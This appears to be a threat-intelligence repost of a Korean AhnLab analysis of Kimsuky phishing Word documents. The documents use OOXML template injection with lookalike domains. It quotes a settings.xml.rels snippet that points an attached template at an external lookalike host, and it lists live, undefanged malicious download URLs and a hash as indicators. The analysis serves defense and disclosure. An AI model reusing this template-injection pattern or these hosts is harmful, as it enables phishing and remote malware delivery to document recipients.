lazarusholic

2022-11-17, Ahnlab
https://asec.ahnlab.com/ko/42233/
#Kimsuky

최근 워드 문서로 위장한 악성코드가 특정 경로(ex. 카카오톡 단체대화방)를 중심으로 유포되는 이슈가 공유된 바 있다.
ASEC 분석팀은 추가 모니터링 과정에서, 유사 워드문서에 사용된 URL이 정상 URL과 유사성 측면에서 매우 교묘해지는 정황을 확인하여 사용자들에게 주의를 당부하고자 한다.
내부적으로 현재까지 확인된 악성 워드문서의 파일명은 다음과 같다.
파일명에서 확인되는 내국인의 실명은 삭제처리(○○○)하였는데, 외교안보 분야의 전문가인 점과 파일명도 대북/대중/설문지/외교안보와 관련된 특징이 있었다.
- 북방한계선(NLL) 문제에 관한 국제법적 검토와.docx
- 시진핑 3기체제 출범의 함의와 전망.docx
- 국가보위성 기구.docx
- 北, 전례 없는 강공 도발 설문지.docx
- ○○○, RIES_이슈인사이트_Vol.33, 시진핑 제3기 출범- 중국은 어디고 가고 있나.docx
- (토론2_참고-1)칩(Chip)_4동명과한국의선택(○○○기고문).docx
- (토론2__참고-2)칩4동맹과대외전략(○○○기고문).docx
- (월드코리안) 시진핑 제3기 출범의 함의와 향후 전망.docx
- 패션과 인권 설문지.docx
위의 파일들은 모두 OOXML(Office Open XML) 포맷을 가진 워드문서이며 Template Injetion 기능을 공격에 활용하였는데, 아래의 XML코드는 특정 워드 파일 내부에 존재하는 settings.xml.rels 파일을 나타낸 것이다.
<?xml version="1.0" encoding="UTF-8" standalone="yes" <Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"> <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="hxxp://schemas.openxmlformat[.]org/officeDocument/2006/relationships/o/word officeid=NPW5D●●●DBS3V" TargetMode="External"/></Relationships>
주목할만한 점은, External URL로 사용된 주소가 정상 URL의 유사성이 매우 높아졌다는 것이다. 아래 URL의 루트도메인 영역을 보면 openxmlformats.org 와 openxmlformat[.]org 으로 s …

d698fccf14f670595442155395f42642
http://ms-office.services
http://ms-offices.com
http://offices.word-template.net
http://offices.word-template.net/office/template?view=GYIJ
http://openxmlformat.org
http://schemas.openxmlformat.org
http://schemas.openxmlformat.org/officeDocument/2006/relationships/o/word
http://schemas.openxmlformat.org/officeDocument/2006/relationships/o/word?officeid=NPW5D
http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate
http://schemas.openxmlformats.org/package/2006/relationships
https://ms-office.services
https://ms-office.services/templates-for-word/download?id=79B9
https://ms-office.services/templates-for-word/download?id=EFHO
https://ms-office.services/templates-for-word/download?id=I5I2
https://ms-office.services/templates-for-word/download?id=V2BX
https://ms-offices.com
https://ms-offices.com/templates-for-word/download?id=AL03
https://ms-offices.com/templates-for-word/download?id=DTF
https://ms-offices.com/templates-for-word/download?id=ZQ9H